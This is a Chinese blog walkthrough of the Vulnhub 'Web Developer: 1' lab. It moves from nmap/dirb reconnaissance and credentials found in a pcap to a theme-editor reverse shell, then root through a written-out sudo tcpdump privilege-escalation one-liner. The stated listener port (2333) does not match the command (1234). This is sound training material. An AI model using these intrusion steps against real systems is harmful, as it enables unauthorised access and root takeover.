【Vulnhub靶机】WEB DEVELOPER: 1

最新推荐文章于 2024-07-27 14:07:25 发布
最新推荐文章于 2024-07-27 14:07:25 发布
阅读量258 收藏 10
点赞数 4
文章标签: 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zzzylty/article/details/140192974
版权

靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/

信息收集

主机发现

使用nmap扫描查看目标靶机端口开放情况
发现开放的端口有22 80

nmap -Pn -sV -p--A 192.168.233.140

目录爆破

dirb http://192.168.233.140

WEB渗透

访问80端口

发现该站点是由wordPress搭建的

通过刚刚目录爆破,访问/ipdata

将这个文件下载下来使用wireshark打开
分析http流数据包发现用户的登录信息

http.request.method == "POST"

结果如下,可以看到发往/wordpress/wp-login.php的POST报文中携带了

用户名webdeveloper,密码Te5eQg&4sBS!Yr$)wf%(DcAd

用找到的用户名密码登录wordpress,登录成功

利用wordpress的上传theme功能getshell

在下处发现一处文件上传页面

将主题背景改为Twenty Sixteen,点击select然后将404.php源码再次修改为反弹shell的代码

攻击机监听2333端口

nc -nlvp 1234

然后浏览器访问http://192.168.233.140//wp-content/themes/twentysixteen/404.php
可以看到kali这边成功反弹回来了一个shell,监听成功

提权

查看当前用户的suid权限

find / -perm -u=s -type f 2>/dev/null

没有什么可利用的命令

查看一下网站根目录下面的文件

cd /var/www/html

发现网站默认配置文件,查看其内容

wordpresss的配置文件wp-config.php

cat wp-config.php

发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)

/** MySQL database username */

define('DB_USER', 'webdeveloper');

/** MySQL database password */

define('DB_PASSWORD', 'MasterOfTheUniverse');

查看webdeveloper用户的sudo命令\

sudo -l

发现tcpdump命令,直接上提权网站进行查找

tcpdump | GTFOBins

webdeveloper@webdeveloper:~$ COMMAND='php /var/www/html/wp-content/themes/twentysixteen/404.php'
webdeveloper@webdeveloper:~$ TF=$(mktemp)
webdeveloper@webdeveloper:~$ echo "$COMMAND" > $TF
webdeveloper@webdeveloper:~$ chmod +x $TF
webdeveloper@webdeveloper:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root

成功提权

Skyusec
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
小白的靶机VulnHub-Web Developer
wo41ge的博客
02-02 1万+
靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 开机界面 就是这样 同样是选择桥接 确定靶机的IP地址:192.168.1.10 靶机开放了22和80端口 还是wordpress框架 访问康康呗 dirb直接扫目录 发现目录/ipdata 有一个数据包 用wireshark 打开分析一下 过滤下http的数据包信息 然后就发现了 账号密码 账号:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd
Vulnhub:WebDeveloper:1靶机
qq_43884092的博客
03-27 199
目录爆破发现ipdata目录,进入该目录发现一个流量包,下载使用wireshark打开,查看/var/www/html/wp-config.php获得数据库账号密码,同时该密码也是系统用户webdeveloper的密码
vulnhub靶场,WEB DEVELOPER: 1
kukudeshuo的博客
12-21 915
vulnhub靶场,WEB DEVELOPER: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/ 攻击机:kali(192.168.109.128) 靶机WEB DEVELOPER: 1(192.168.109.191) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取到root权限下的flag 信息收集 使用arp-scan查看确定目标靶机
vulnhub Web Developer: 1
箭雨镜屋
01-02 1903
本文思路: nmap扫描---->dirb扫描---->wireshark分析.cap文件发现wordpress用户名和密码---->利用wordpress的上传theme功能getshell---->用linpeas.sh找到webdeveloper用户账号密码---->利用tcpdump命令进行sudo提权
vulnhub靶场,WEB DEVELOPER:1——新手进阶2
m0_75051044的博客
01-25 1903
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式,使攻击机和靶机的网络连接一样。然后浏览器访问http://192.168.109.191//wp-content/themes/twentysixteen/404.php。发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)使用arp-scan -l扫描确定靶机ip,当然也可以用nmap和netdiscover。
No.29-VulnHub-Web Developer: 1-Walkthrough渗透学习
qq_34801745的博客
01-24 927
** VulnHub-Web Developer: 1-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/web-developer-1,288/ 靶机难度:初级(CTF) 靶机发布日期:2018年11月5日 靶机描述: Zico试图建立自己的网站,但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主...
Vulnhub 靶机渗透:SICKOS: 1.2
Mysmycbx的博客
06-07 1075
使用curl -X OPTIONS查看网站能够使用哪些请求方式,然后使用PUT进行上传恶意文件,例如一句话木马,反弹shell等。反弹shell时,尝试多个shell,bash,pyhton等。定时任务不止一个路径,/etc/crontab, 还有/etc/cron* ,包含/etc/cron.d,/etc/cron.daily等。定时任务里发现应用,一定要搜相关漏洞,搜到后综合多个poc进行利用。
Vulnhub靶机 web-developer writeup
xingjinhao123的博客
01-23 2338
下载地址:https://www.vulnhub.com/entry/web-developer-1,288​ 信息搜集 扫描IP地址 ​ 扫描开放的端口 ​ 80端口 发现有wordpress内容管理系统​ 列举目录 访问ipdata目录发现有analyze.cap下载下来看一下​ 在180这条数据流中发现了登录信息,用户名:webdeveloper 密码:Te5eQg&4sBS!Yr$)wf%(DcAd​ 成功登录到后台​ getsh...
Vulnhub靶机渗透测试实战(二):Web Developer: 1
weixin_41038469的博客
03-18 3234
靶机下载地址: https://www.vulnhub.com/entry/webdeveloper-1,288/ 攻击机ip: 172.20.10.5 经过主机发现 靶机ip地址: 172.20.10.11 上传shellcode 发现后台有更改插件代码的功能,选择Plugins->Editor 选择要更改的插件:Hello Dolly 上传shellcode,以获得反弹shell fso...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8349
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全自学从入门到精通的制胜攻略!!!
最新发布
2301_77160226的博客
07-27 111
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
“微软蓝屏”事件暴露了网络安全哪些问题?
csdn_aspnet的专栏
07-23 1246
这次由微软系统软件更新引发的“微软蓝屏”事件,无疑是对全球IT基础设施韧性与安全性的重大考验。850万台设备的故障,以及对航空、医疗和传媒等关键行业的广泛影响,再次突显出我们在网络安全和系统稳定性方面的脆弱性。一、问题解析1、更新管理的复杂性:随着技术的不断进步,软件更新的复杂性也在增加。大型系统中,需要兼顾各种硬件、软件和环境,确保更新不会引发兼容性问题,而这往往十分困难。2、供应链风险:如这次事件所示,一个小小的缺陷就可能通过供应链扩散,造成全球性影响。
网络安全常见错误及解决办法(更新中)
qq_42041946的博客
07-22 512
设置一下wwwtest访问权限做负载均衡使用火狐浏览器访问一直访问一个页面,使用谷歌就正常两个也轮换,是火狐浏览器的问题在nginx的配置文件里改站点根目录,但是网页报了403 Forbidden,重安装了个centos也不行强制刷新过了,改回相对路径html才可以。答:403就是没有权限 再/web这个文件夹下chown -R nginx:nginx .(如果不行就看看你的selinux 有没有关闭,vim /etc/selinux/config 看看是不是disabled。
vulnhub靶机——raven: 2
09-03
- *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值